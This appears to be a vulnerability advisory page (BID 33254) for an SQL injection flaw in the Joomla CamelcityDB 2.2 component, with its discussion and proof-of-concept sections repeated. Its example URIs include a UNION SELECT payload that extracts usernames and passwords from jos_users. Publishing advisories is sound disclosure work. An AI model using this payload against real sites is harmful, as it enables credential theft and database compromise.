Joomla! CamelcityDB Component SQL Injection Vulnerability
BID:33254
Info
Joomla! CamelcityDB Component SQL Injection Vulnerability
| Bugtraq ID: | 33254 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 14 2009 12:00AM |
| Updated: | Aug 02 2010 08:45PM |
| Credit: | H!tm@N |
| Vulnerable: |
Joomla CamelcityDB 2.2 |
| Not Vulnerable: | |
Discussion
Joomla! CamelcityDB Component SQL Injection Vulnerability
The CamelcityDB 'com_camelcitydb2' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
CamelcityDB 2.2 is vulnerable; other versions may also be affected.
The CamelcityDB 'com_camelcitydb2' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
CamelcityDB 2.2 is vulnerable; other versions may also be affected.
Exploit / POC
Joomla! CamelcityDB Component SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example URIs are available:
http://www.example.com/index.php?option=com_camelcitydb2&id=[SQL]&view=detail&Itemid=15
http://www.example.com/index.php?option=com_camelcitydb2&id=-3+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11+from+jos_users--
Attackers can use a browser to exploit this issue.
The following example URIs are available:
http://www.example.com/index.php?option=com_camelcitydb2&id=[SQL]&view=detail&Itemid=15
http://www.example.com/index.php?option=com_camelcitydb2&id=-3+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11+from+jos_users--
Solution / Fix
Joomla! CamelcityDB Component SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Joomla! CamelcityDB Component SQL Injection Vulnerability
References:
References:
- CamelcityDB Component (Joomla)